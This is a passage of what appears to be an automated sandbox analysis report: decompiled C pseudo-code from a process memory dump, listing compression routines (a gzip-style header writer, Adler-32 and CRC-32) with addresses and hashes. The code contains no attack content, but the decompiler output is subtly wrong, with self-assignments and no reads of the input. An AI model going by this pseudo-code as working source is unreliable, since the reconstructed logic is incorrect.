                                    												if(_t403 > 0) {
                                    													if(_t403 != 2) {
                                    														E2402FCC8(_t557,  *(_t695 + 0x30) >> 0x10);
                                    														E2402FCC8(_t557,  *(_t695 + 0x30) & 0x0000ffff);
                                    													} else {
                                    														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 0x30) & 0x000000ff;
                                    														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 0x30) >> 0x00000008 & 0x000000ff;
                                    														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 0x30) >> 0x00000010 & 0x000000ff;
                                    														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 0x30) >> 0x00000018 & 0x000000ff;
                                    														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 8) & 0x000000ff;
                                    														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 8) >> 0x00000008 & 0x000000ff;
                                    														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 8) >> 0x00000010 & 0x000000ff;
                                    														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    														_t558 =  *(_t557 + 8);
                                    														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 8) >> 0x00000018 & 0x000000ff;
                                    													}
                                    													E2402FCF0(_t695, _t558);
                                    													_t410 =  *(_t557 + 0x18);
                                    													if(_t410 > 0) {
                                    														 *(_t557 + 0x18) =  ~_t410;
                                    													}
                                    													if( *(_t557 + 0x14) == 0) {
                                    														return 1;
                                    													} else {
                                    														return 0;
                                    													}
                                    												}
                                    												return 1;
                                    											}
                                    											return 0;
                                    										}
                                    									} else {
                                    										_t625 =  *0x2405731c; // 0x2402ee9c
                                    										 *((intOrPtr*)(_t695 + 0x18)) = _t625;
                                    										return 0xfffffffb;
                                    									}
                                    								}
                                    								 *((intOrPtr*)(_t557 + 0x28)) = 0xffffffff;
                                    								return 0;
                                    							}
                                    						}
                                    						if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x24)) == 0) {
                                    							 *((intOrPtr*)(_t557 + 4)) = 0x67;
                                    							goto L110;
                                    						}
                                    						_t697 =  *(_t557 + 0x14);
                                    						do {
                                    							if( *(_t557 + 0x14) !=  *((intOrPtr*)(_t557 + 0xc))) {
                                    								goto L103;
                                    							}
                                    							if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0 && _t697 <  *(_t557 + 0x14)) {
                                    								_t558 =  *(_t557 + 0x14) - _t697;
                                    								 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14) - _t697,  *(_t557 + 8) + _t697);
                                    							}
                                    							E2402FCF0(_t695, _t558);
                                    							_t471 =  *(_t557 + 0x14);
                                    							_t697 = _t471;
                                    							if(_t471 ==  *((intOrPtr*)(_t557 + 0xc))) {
                                    								_v24 = 1;
                                    								break;
                                    							}
                                    							L103:
                                    							 *((intOrPtr*)(_t557 + 0x20)) =  *((intOrPtr*)(_t557 + 0x20)) + 1;
                                    							_v24 =  *( *((intOrPtr*)( *(_t557 + 0x1c) + 0x24)) +  *((intOrPtr*)(_t557 + 0x20))) & 0x000000ff;
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							_t558 =  *(_t557 + 8);
                                    							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = _v24;
                                    						} while (_v24 != 0);
                                    						if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0 && _t697 <  *(_t557 + 0x14)) {
                                    							_t558 =  *(_t557 + 0x14) - _t697;
                                    							 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14) - _t697,  *(_t557 + 8) + _t697);
                                    						}
                                    						if(_v24 == 0) {
                                    							 *((intOrPtr*)(_t557 + 4)) = 0x67;
                                    						}
                                    						goto L110;
                                    					}
                                    					if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x1c)) == 0) {
                                    						 *((intOrPtr*)(_t557 + 4)) = 0x5b;
                                    						goto L94;
                                    					}
                                    					_t698 =  *(_t557 + 0x14);
                                    					do {
                                    						if( *(_t557 + 0x14) !=  *((intOrPtr*)(_t557 + 0xc))) {
                                    							goto L87;
                                    						}
                                    						if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0 && _t698 <  *(_t557 + 0x14)) {
                                    							_t558 =  *(_t557 + 0x14) - _t698;
                                    							 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14) - _t698,  *(_t557 + 8) + _t698);
                                    						}
                                    						E2402FCF0(_t695, _t558);
                                    						_t483 =  *(_t557 + 0x14);
                                    						_t698 = _t483;
                                    						if(_t483 ==  *((intOrPtr*)(_t557 + 0xc))) {
                                    							_v28 = 1;
                                    							break;
                                    						}
                                    						L87:
                                    						 *((intOrPtr*)(_t557 + 0x20)) =  *((intOrPtr*)(_t557 + 0x20)) + 1;
                                    						_v28 =  *( *((intOrPtr*)( *(_t557 + 0x1c) + 0x1c)) +  *((intOrPtr*)(_t557 + 0x20))) & 0x000000ff;
                                    						 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    						_t558 =  *(_t557 + 8);
                                    						 *( *(_t557 + 8) +  *(_t557 + 0x14)) = _v28;
                                    					} while (_v28 != 0);
                                    					if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0 && _t698 <  *(_t557 + 0x14)) {
                                    						_t558 =  *(_t557 + 0x14) - _t698;
                                    						 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14) - _t698,  *(_t557 + 8) + _t698);
                                    					}
                                    					if(_v28 == 0) {
                                    						_t558 = 0;
                                    						 *((intOrPtr*)(_t557 + 0x20)) = 0;
                                    						 *((intOrPtr*)(_t557 + 4)) = 0x5b;
                                    					}
                                    					goto L94;
                                    				}
                                    				if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x10)) == 0) {
                                    					 *((intOrPtr*)(_t557 + 4)) = 0x49;
                                    					goto L78;
                                    				}
                                    				_t699 =  *(_t557 + 0x14);
                                    				while(( *( *(_t557 + 0x1c) + 0x14) & 0x0000ffff) >  *((intOrPtr*)(_t557 + 0x20))) {
                                    					if( *(_t557 + 0x14) !=  *((intOrPtr*)(_t557 + 0xc))) {
                                    						L70:
                                    						 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    						_t558 =  *(_t557 + 8);
                                    						 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)( *(_t557 + 0x1c) + 0x10)) +  *((intOrPtr*)(_t557 + 0x20))));
                                    						 *((intOrPtr*)(_t557 + 0x20)) =  *((intOrPtr*)(_t557 + 0x20)) + 1;
                                    						continue;
                                    					}
                                    					if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0 && _t699 <  *(_t557 + 0x14)) {
                                    						_t558 =  *(_t557 + 0x14) - _t699;
                                    						 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14) - _t699,  *(_t557 + 8) + _t699);
                                    					}
                                    					E2402FCF0(_t695, _t558);
                                    					_t492 =  *(_t557 + 0x14);
                                    					_t699 = _t492;
                                    					if(_t492 ==  *((intOrPtr*)(_t557 + 0xc))) {
                                    						break;
                                    					} else {
                                    						goto L70;
                                    					}
                                    				}
                                    				_t558 =  *(_t557 + 0x1c);
                                    				if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0 && _t699 <  *(_t557 + 0x14)) {
                                    					_t558 =  *(_t557 + 0x14) - _t699;
                                    					 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14) - _t699,  *(_t557 + 8) + _t699);
                                    				}
                                    				if( *( *(_t557 + 0x1c) + 0x14) ==  *((intOrPtr*)(_t557 + 0x20))) {
                                    					_t558 = 0;
                                    					 *((intOrPtr*)(_t557 + 0x20)) = 0;
                                    					 *((intOrPtr*)(_t557 + 4)) = 0x49;
                                    				}
                                    				goto L78;
                                    			}

                                    0x2402fd4b
                                    0x2402fd4d
                                    0x2402fd51
                                    0x00000000
                                    0x2402fd62
                                    0x2402fd70
                                    0x2402fd73
                                    0x2402fd8e
                                    0x2402fd93
                                    0x00000000
                                    0x2402fd96
                                    0x2402fda4
                                    0x2402fda6
                                    0x2402fdb1
                                    0x00000000
                                    0x2402fdb1
                                    0x2402fdb9
                                    0x2402fdbe
                                    0x2402fdc1
                                    0x2402fdc8
                                    0x2402fdd2
                                    0x2403000b
                                    0x24030015
                                    0x24030020
                                    0x24030024
                                    0x24030024
                                    0x2403002d
                                    0x24030039
                                    0x24030042
                                    0x2403003b
                                    0x2403003b
                                    0x2403003b
                                    0x2403002f
                                    0x2403002f
                                    0x2403002f
                                    0x2403002d
                                    0x2403004a
                                    0x24030050
                                    0x24030052
                                    0x24030052
                                    0x2403006b
                                    0x24030074
                                    0x2403007d
                                    0x24030087
                                    0x24030097
                                    0x24030097
                                    0x2403009c
                                    0x240300a7
                                    0x2402fdd8
                                    0x2402fde3
                                    0x2402fde9
                                    0x2402fdef
                                    0x2402fdf6
                                    0x2402fdfc
                                    0x2402fe03
                                    0x2402fe09
                                    0x2402fe11
                                    0x2402fea8
                                    0x2402feae
                                    0x2402feaa
                                    0x2402feaa
                                    0x2402feaa
                                    0x2402feb7
                                    0x2402febd
                                    0x2402feb9
                                    0x2402feb9
                                    0x2402feb9
                                    0x2402febf
                                    0x2402fec8
                                    0x2402fece
                                    0x2402feca
                                    0x2402feca
                                    0x2402feca
                                    0x2402fed0
                                    0x2402fed9
                                    0x2402fedf
                                    0x2402fedb
                                    0x2402fedb
                                    0x2402fedb
                                    0x2402fee1
                                    0x2402feea
                                    0x2402fef0
                                    0x2402feec
                                    0x2402feec
                                    0x2402feec
                                    0x2402fef7
                                    0x2402fefd
                                    0x2402ff03
                                    0x2402ff11
                                    0x2402ff17
                                    0x2402ff28
                                    0x2402ff2e
                                    0x2402ff3f
                                    0x2402ff45
                                    0x2402ff56
                                    0x2402ff59
                                    0x2402ff5c
                                    0x2402ff66
                                    0x2402ff69
                                    0x2402ff76
                                    0x2402ff81
                                    0x2402ff85
                                    0x2402ff85
                                    0x2402ff85
                                    0x2402ff6b
                                    0x2402ff6b
                                    0x2402ff6b
                                    0x2402ff87
                                    0x2402ff8d
                                    0x2402ff90
                                    0x2402ff9b
                                    0x2402ff9e
                                    0x2402ffa5
                                    0x2402ffaa
                                    0x2402ffb4
                                    0x2402ffba
                                    0x2402ffbf
                                    0x2402ffce
                                    0x2402ffd1
                                    0x2402ffd1
                                    0x2402ffdb
                                    0x2402ffdd
                                    0x2402ffeb
                                    0x2402ffeb
                                    0x2402fff0
                                    0x2402fff3
                                    0x2402fe17
                                    0x2402fe1a
                                    0x2402fe20
                                    0x2402fe27
                                    0x2402fe2d
                                    0x2402fe34
                                    0x2402fe3a
                                    0x2402fe41
                                    0x2402fe47
                                    0x2402fe4e
                                    0x2402fe54
                                    0x2402fe58
                                    0x2402fe5b
                                    0x2402fe65
                                    0x2402fe68
                                    0x2402fe75
                                    0x2402fe80
                                    0x2402fe84
                                    0x2402fe84
                                    0x2402fe84
                                    0x2402fe6a
                                    0x2402fe6a
                                    0x2402fe6a
                                    0x2402fe86
                                    0x2402fe8c
                                    0x2402fe92
                                    0x2402fe96
                                    0x2402fe96
                                    0x2402fe11
                                    0x2402fdd2
                                    0x240300ae
                                    0x24030171
                                    0x24030175
                                    0x2403023b
                                    0x2403023f
                                    0x24030300
                                    0x24030304
                                    0x24030306
                                    0x2403030d
                                    0x2403036a
                                    0x2403030f
                                    0x24030318
                                    0x2403031c
                                    0x2403031c
                                    0x2403032a
                                    0x2403032f
                                    0x2403033b
                                    0x24030341
                                    0x24030350
                                    0x24030353
                                    0x2403035e
                                    0x24030361
                                    0x24030361
                                    0x2403032a
                                    0x2403030d
                                    0x24030375
                                    0x24030398
                                    0x00000000
                                    0x240303a4
                                    0x240303a4
                                    0x240303af
                                    0x00000000
                                    0x240303af
                                    0x24030377
                                    0x24030379
                                    0x24030382
                                    0x240303b7
                                    0x240303be
                                    0x240303dd
                                    0x24030410
                                    0x24030419
                                    0x24030422
                                    0x24030422
                                    0x2403042e
                                    0x2403043b
                                    0x2403043d
                                    0x2403043d
                                    0x00000000
                                    0x2403044b
                                    0x24030450
                                    0x00000000
                                    0x00000000
                                    0x24030455
                                    0x24030462
                                    0x24030468
                                    0x24030470
                                    0x24030475
                                    0x24030478
                                    0x2403048c
                                    0x24030491
                                    0x24030457
                                    0x24030459
                                    0x24030459
                                    0x24030496
                                    0x2403049f
                                    0x00000000
                                    0x240304a1
                                    0x240304a1
                                    0x00000000
                                    0x240304a8
                                    0x2403049f
                                    0x240304af
                                    0x240304af
                                    0x240304b2
                                    0x240304bb
                                    0x240304c0
                                    0x240304cf
                                    0x24030579
                                    0x24030589
                                    0x240304d5
                                    0x240304d8
                                    0x240304e3
                                    0x240304e9
                                    0x240304f7
                                    0x240304fd
                                    0x2403050b
                                    0x24030511
                                    0x2403051f
                                    0x24030525
                                    0x24030530
                                    0x24030536
                                    0x24030544
                                    0x2403054a
                                    0x24030558
                                    0x2403055e
                                    0x24030561
                                    0x2403056c
                                    0x2403056c
                                    0x24030590
                                    0x24030595
                                    0x2403059a
                                    0x2403059e
                                    0x2403059e
                                    0x240305a5
                                    0x00000000
                                    0x240305a7
                                    0x00000000
                                    0x240305a7
                                    0x240305a5
                                    0x00000000
                                    0x240304c2
                                    0x00000000
                                    0x240304b4
                                    0x240303c6
                                    0x240303c6
                                    0x240303d1
                                    0x00000000
                                    0x240303d1
                                    0x240303be
                                    0x24030384
                                    0x00000000
                                    0x2403038b
                                    0x24030375
                                    0x2403024c
                                    0x240302f9
                                    0x00000000
                                    0x240302f9
                                    0x24030252
                                    0x24030255
                                    0x2403025b
                                    0x00000000
                                    0x00000000
                                    0x24030264
                                    0x24030271
                                    0x2403027d
                                    0x2403027d
                                    0x24030282
                                    0x24030287
                                    0x2403028a
                                    0x2403028f
                                    0x24030291
                                    0x00000000
                                    0x24030291
                                    0x2403029b
                                    0x2403029e
                                    0x240302ab
                                    0x240302b2
                                    0x240302b5
                                    0x240302bc
                                    0x240302bf
                                    0x240302cd
                                    0x240302da
                                    0x240302e6
                                    0x240302e6
                                    0x240302ee
                                    0x240302f0
                                    0x240302f0
                                    0x00000000
                                    0x240302ee
                                    0x24030182
                                    0x24030234
                                    0x00000000
                                    0x24030234
                                    0x24030188
                                    0x2403018b
                                    0x24030191
                                    0x00000000
                                    0x00000000
                                    0x2403019a
                                    0x240301a7
                                    0x240301b3
                                    0x240301b3
                                    0x240301b8
                                    0x240301bd
                                    0x240301c0
                                    0x240301c5
                                    0x240301c7
                                    0x00000000
                                    0x240301c7
                                    0x240301d1
                                    0x240301d4
                                    0x240301e1
                                    0x240301e8
                                    0x240301eb
                                    0x240301f2
                                    0x240301f5
                                    0x24030203
                                    0x24030210
                                    0x2403021c
                                    0x2403021c
                                    0x24030224
                                    0x24030226
                                    0x24030228
                                    0x2403022b
                                    0x2403022b
                                    0x00000000
                                    0x24030224
                                    0x240300bb
                                    0x2403016a
                                    0x00000000
                                    0x2403016a
                                    0x240300c1
                                    0x2403011d
                                    0x240300cc
                                    0x24030102
                                    0x24030111
                                    0x24030114
                                    0x24030117
                                    0x2403011a
                                    0x00000000
                                    0x2403011a
                                    0x240300d5
                                    0x240300e2
                                    0x240300ee
                                    0x240300ee
                                    0x240300f3
                                    0x240300f8
                                    0x240300fb
                                    0x24030100
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x24030100
                                    0x2403012e
                                    0x24030135
                                    0x24030142
                                    0x2403014e
                                    0x2403014e
                                    0x2403015a
                                    0x2403015c
                                    0x2403015e
                                    0x24030161
                                    0x24030161
                                    0x00000000

                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1324569676030001962594cb11772bef0d4ac0f70d6c902ff0776469fb6b5cc9
                                    • Instruction ID: ca329548274935c41ef3cc54b97bc8c95bf02a460d190cdab6f0932d49d0e833
                                    • Opcode Fuzzy Hash: 1324569676030001962594cb11772bef0d4ac0f70d6c902ff0776469fb6b5cc9
                                    • Instruction Fuzzy Hash: B3520074605600CFDB5ACF28C5C0A577FE2AB85314F1486A9DC568F28BC734E996CFA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E2402F414(signed int __eax, void* __ecx, void* __edx) {
                                    				void* _t69;
                                    				signed int _t86;
                                    				signed int _t87;
                                    				signed int _t88;
                                    				signed int _t89;
                                    				signed int _t90;
                                    				signed int _t91;
                                    				signed int _t92;
                                    				signed int _t93;
                                    				signed int _t94;
                                    				signed int _t95;
                                    				signed int _t96;
                                    				signed int _t97;
                                    				signed int _t98;
                                    				signed int _t99;
                                    				signed int _t100;
                                    				signed int _t101;
                                    				signed int _t102;
                                    				signed int _t103;
                                    				signed int _t104;
                                    				signed int _t105;
                                    				signed int _t106;
                                    				signed int _t107;
                                    				signed int _t108;
                                    				signed int _t109;
                                    				signed int _t110;
                                    				signed int _t111;
                                    				signed int _t112;
                                    				signed int _t113;
                                    				signed int _t114;
                                    				signed int _t115;
                                    				signed int _t116;
                                    				signed int _t117;
                                    				void* _t119;
                                    				void* _t150;
                                    				signed int _t195;
                                    				signed int _t227;
                                    				void* _t229;
                                    
                                    				_t229 = __ecx;
                                    				_t195 = __eax >> 0x00000010 & 0x0000ffff;
                                    				_t86 = __eax & 0x0000ffff;
                                    				_t228 = __edx;
                                    				if(__ecx != 1) {
                                    					if(__edx != 0) {
                                    						if(__ecx >= 0x10) {
                                    							if(__ecx < 0x15b0) {
                                    								L19:
                                    								if(_t229 == 0) {
                                    									L26:
                                    									return _t195 << 0x00000010 | _t86;
                                    								}
                                    								if(_t229 < 0x10) {
                                    									while(1) {
                                    										L24:
                                    										_t119 = _t229;
                                    										_t229 = _t229 + 0xffffffff;
                                    										if(_t119 == 0) {
                                    											break;
                                    										}
                                    										_t86 = _t86;
                                    										_t228 = _t228 + 1;
                                    										_t195 = _t195 + _t86;
                                    									}
                                    									_t86 = _t86 % 0xfff1;
                                    									_t195 = _t195 % 0xfff1;
                                    									goto L26;
                                    								} else {
                                    									goto L21;
                                    								}
                                    								do {
                                    									L21:
                                    									_t229 = _t229 - 0x10;
                                    									_t87 = _t86;
                                    									_t88 = _t87;
                                    									_t89 = _t88;
                                    									_t90 = _t89;
                                    									_t91 = _t90;
                                    									_t92 = _t91;
                                    									_t93 = _t92;
                                    									_t94 = _t93;
                                    									_t95 = _t94;
                                    									_t96 = _t95;
                                    									_t97 = _t96;
                                    									_t98 = _t97;
                                    									_t99 = _t98;
                                    									_t100 = _t99;
                                    									_t101 = _t100;
                                    									_t86 = _t101;
                                    									_t195 = _t195 + _t87 + _t88 + _t89 + _t90 + _t91 + _t92 + _t93 + _t94 + _t95 + _t96 + _t97 + _t98 + _t99 + _t100 + _t101 + _t86;
                                    									_t228 = _t228 + 0x10;
                                    								} while (_t229 >= 0x10);
                                    								goto L24;
                                    							} else {
                                    								goto L16;
                                    							}
                                    							do {
                                    								L16:
                                    								_t229 = _t229 - 0x15b0;
                                    								_t69 = 0x15b;
                                    								do {
                                    									_t102 = _t86;
                                    									_t103 = _t102;
                                    									_t104 = _t103;
                                    									_t105 = _t104;
                                    									_t106 = _t105;
                                    									_t107 = _t106;
                                    									_t108 = _t107;
                                    									_t109 = _t108;
                                    									_t110 = _t109;
                                    									_t111 = _t110;
                                    									_t112 = _t111;
                                    									_t113 = _t112;
                                    									_t114 = _t113;
                                    									_t115 = _t114;
                                    									_t116 = _t115;
                                    									_t86 = _t116;
                                    									_t195 = _t195 + _t102 + _t103 + _t104 + _t105 + _t106 + _t107 + _t108 + _t109 + _t110 + _t111 + _t112 + _t113 + _t114 + _t115 + _t116 + _t86;
                                    									_t228 = _t228 + 0x10;
                                    									_t69 = _t69 - 1;
                                    								} while (_t69 != 0);
                                    								_t86 = _t86 % 0xfff1;
                                    								_t195 = _t195 % 0xfff1;
                                    							} while (_t229 >= 0x15b0);
                                    							goto L19;
                                    						}
                                    						while(1) {
                                    							_t150 = _t229;
                                    							_t229 = _t229 + 0xffffffff;
                                    							if(_t150 == 0) {
                                    								break;
                                    							}
                                    							_t86 = _t86;
                                    							_t228 = _t228 + 1;
                                    							_t195 = _t195 + _t86;
                                    						}
                                    						if(_t86 >= 0xfff1) {
                                    							_t86 = _t86 - 0xfff1;
                                    						}
                                    						return _t195 % 0x0000fff1 << 0x00000010 | _t86;
                                    					}
                                    					return 1;
                                    				}
                                    				_t117 = _t86;
                                    				if(_t117 >= 0xfff1) {
                                    					_t117 = _t117 - 0xfff1;
                                    				}
                                    				_t227 = _t195 + _t117;
                                    				if(_t227 >= 0xfff1) {
                                    					_t227 = _t227 - 0xfff1;
                                    				}
                                    				return _t227 << 0x00000010 | _t117;
                                    			}

                                    0x2402f41f
                                    0x2402f421
                                    0x2402f427
                                    0x2402f430
                                    0x2402f432
                                    0x2402f466
                                    0x2402f475
                                    0x2402f4b8
                                    0x2402f588
                                    0x2402f58a
                                    0x2402f665
                                    0x00000000
                                    0x2402f66a
                                    0x2402f593
                                    0x2402f642
                                    0x2402f642
                                    0x2402f642
                                    0x2402f644
                                    0x2402f649
                                    0x00000000
                                    0x00000000
                                    0x2402f63d
                                    0x2402f63f
                                    0x2402f640
                                    0x2402f640
                                    0x2402f656
                                    0x2402f663
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x2402f599
                                    0x2402f599
                                    0x2402f599
                                    0x2402f5a0
                                    0x2402f5a9
                                    0x2402f5b2
                                    0x2402f5bb
                                    0x2402f5c4
                                    0x2402f5cd
                                    0x2402f5d6
                                    0x2402f5df
                                    0x2402f5e8
                                    0x2402f5f1
                                    0x2402f5fa
                                    0x2402f603
                                    0x2402f60c
                                    0x2402f615
                                    0x2402f61e
                                    0x2402f627
                                    0x2402f629
                                    0x2402f62b
                                    0x2402f62e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x2402f4be
                                    0x2402f4be
                                    0x2402f4be
                                    0x2402f4c4
                                    0x2402f4c9
                                    0x2402f4cd
                                    0x2402f4d6
                                    0x2402f4df
                                    0x2402f4e8
                                    0x2402f4f1
                                    0x2402f4fa
                                    0x2402f503
                                    0x2402f50c
                                    0x2402f515
                                    0x2402f51e
                                    0x2402f527
                                    0x2402f530
                                    0x2402f539
                                    0x2402f542
                                    0x2402f54b
                                    0x2402f554
                                    0x2402f556
                                    0x2402f558
                                    0x2402f55b
                                    0x2402f55b
                                    0x2402f56d
                                    0x2402f57a
                                    0x2402f57c
                                    0x00000000
                                    0x2402f4be
                                    0x2402f482
                                    0x2402f482
                                    0x2402f484
                                    0x2402f489
                                    0x00000000
                                    0x00000000
                                    0x2402f47d
                                    0x2402f47f
                                    0x2402f480
                                    0x2402f480
                                    0x2402f491
                                    0x2402f493
                                    0x2402f493
                                    0x00000000
                                    0x2402f4ab
                                    0x00000000
                                    0x2402f468
                                    0x2402f438
                                    0x2402f440
                                    0x2402f442
                                    0x2402f442
                                    0x2402f448
                                    0x2402f450
                                    0x2402f452
                                    0x2402f452
                                    0x00000000

                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a46a25728c0e4dbe5aa0a1433bd48846487817f0c63754d6310f19dcd07371b1
                                    • Instruction ID: 914b18599cbe833f8515df6703e9411321722583a853c81507b953dfd69011a6
                                    • Opcode Fuzzy Hash: a46a25728c0e4dbe5aa0a1433bd48846487817f0c63754d6310f19dcd07371b1
                                    • Instruction Fuzzy Hash: 3761652238DB8103E33DCE7D5CE02B7DAD35FC521862ED97D94DAC3F82E899A5565104
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E24035C24(signed int __eax, void* __ecx, signed char __edx) {
                                    				signed int _t121;
                                    				unsigned int _t127;
                                    				signed int _t128;
                                    				unsigned int _t129;
                                    				signed int _t130;
                                    				unsigned int _t132;
                                    				signed int _t133;
                                    				unsigned int _t135;
                                    				signed int _t136;
                                    				unsigned int _t138;
                                    				signed int _t139;
                                    				unsigned int _t141;
                                    				signed int _t142;
                                    				unsigned int _t144;
                                    				signed int _t145;
                                    				unsigned int _t147;
                                    				signed int _t148;
                                    				unsigned int _t150;
                                    				signed int _t151;
                                    				void* _t154;
                                    				signed char _t161;
                                    				signed int* _t162;
                                    				signed char* _t163;
                                    				signed int* _t169;
                                    				signed int* _t170;
                                    				signed int* _t171;
                                    				signed int* _t172;
                                    				signed int* _t173;
                                    				signed int* _t174;
                                    				signed int* _t175;
                                    				signed int _t185;
                                    				signed int _t188;
                                    				signed int _t191;
                                    				signed int _t194;
                                    				signed int _t197;
                                    				signed int _t200;
                                    				signed int _t203;
                                    				signed int _t206;
                                    				signed int _t209;
                                    				signed int _t212;
                                    				signed int _t215;
                                    				signed int _t218;
                                    				signed int _t221;
                                    				signed int _t224;
                                    				signed int _t227;
                                    				signed int _t230;
                                    				signed int _t233;
                                    				signed int _t236;
                                    				signed int _t237;
                                    				signed int _t249;
                                    				signed int _t255;
                                    				signed int _t261;
                                    				signed int _t267;
                                    				signed int _t273;
                                    				signed int _t279;
                                    				signed int _t285;
                                    				signed int _t291;
                                    				signed int _t297;
                                    
                                    				_t161 = __edx;
                                    				_t154 = __ecx;
                                    				_t121 =  !((__eax >> 0x18) + (__eax >> 0x00000008 & 0x0000ff00) + ((__eax & 0x0000ff00) << 8) + ((__eax & 0x000000ff) << 0x18));
                                    				while(_t154 != 0 && (_t161 & 0x00000003) != 0) {
                                    					_t237 =  *_t161 & 0x000000ff;
                                    					_t161 = _t161 + 1;
                                    					_t2 = (_t121 >> 0x00000018 ^ _t237) * 4; // 0x0
                                    					_t154 = _t154 - 1;
                                    					_t121 =  *(0x24058a24 + _t2 + 0x1000) ^ _t121 << 0x00000008;
                                    				}
                                    				_t162 = _t161 - 4;
                                    				while(_t154 >= 0x20) {
                                    					_t169 =  &(_t162[1]);
                                    					_t129 = _t121 ^  *_t169;
                                    					_t170 =  &(_t169[1]);
                                    					_t255 = _t129 & 0x000000ff;
                                    					_t191 = _t129 >> 0x00000008 & 0x000000ff;
                                    					_t7 = _t255 * 4; // 0x0
                                    					_t10 = _t191 * 4; // 0x0
                                    					_t194 = _t129 >> 0x00000010 & 0x000000ff;
                                    					_t130 = _t129 >> 0x18;
                                    					_t13 = _t194 * 4; // 0x0
                                    					_t16 = _t130 * 4; // 0x0
                                    					_t132 =  *(0x24058a24 + _t7 + 0x1000) ^  *(0x24058a24 + _t10 + 0x1400) ^  *(0x24058a24 + _t13 + 0x1800) ^  *(0x24058a24 + _t16 + 0x1c00) ^  *_t170;
                                    					_t171 =  &(_t170[1]);
                                    					_t261 = _t132 & 0x000000ff;
                                    					_t197 = _t132 >> 0x00000008 & 0x000000ff;
                                    					_t19 = _t261 * 4; // 0x0
                                    					_t22 = _t197 * 4; // 0x0
                                    					_t200 = _t132 >> 0x00000010 & 0x000000ff;
                                    					_t133 = _t132 >> 0x18;
                                    					_t25 = _t200 * 4; // 0x0
                                    					_t28 = _t133 * 4; // 0x0
                                    					_t135 =  *(0x24058a24 + _t19 + 0x1000) ^  *(0x24058a24 + _t22 + 0x1400) ^  *(0x24058a24 + _t25 + 0x1800) ^  *(0x24058a24 + _t28 + 0x1c00) ^  *_t171;
                                    					_t172 =  &(_t171[1]);
                                    					_t267 = _t135 & 0x000000ff;
                                    					_t203 = _t135 >> 0x00000008 & 0x000000ff;
                                    					_t31 = _t267 * 4; // 0x0
                                    					_t34 = _t203 * 4; // 0x0
                                    					_t206 = _t135 >> 0x00000010 & 0x000000ff;
                                    					_t136 = _t135 >> 0x18;
                                    					_t37 = _t206 * 4; // 0x0
                                    					_t40 = _t136 * 4; // 0x0
                                    					_t138 =  *(0x24058a24 + _t31 + 0x1000) ^  *(0x24058a24 + _t34 + 0x1400) ^  *(0x24058a24 + _t37 + 0x1800) ^  *(0x24058a24 + _t40 + 0x1c00) ^  *_t172;
                                    					_t173 =  &(_t172[1]);
                                    					_t273 = _t138 & 0x000000ff;
                                    					_t209 = _t138 >> 0x00000008 & 0x000000ff;
                                    					_t43 = _t273 * 4; // 0x0
                                    					_t46 = _t209 * 4; // 0x0
                                    					_t212 = _t138 >> 0x00000010 & 0x000000ff;
                                    					_t139 = _t138 >> 0x18;
                                    					_t49 = _t212 * 4; // 0x0
                                    					_t52 = _t139 * 4; // 0x0
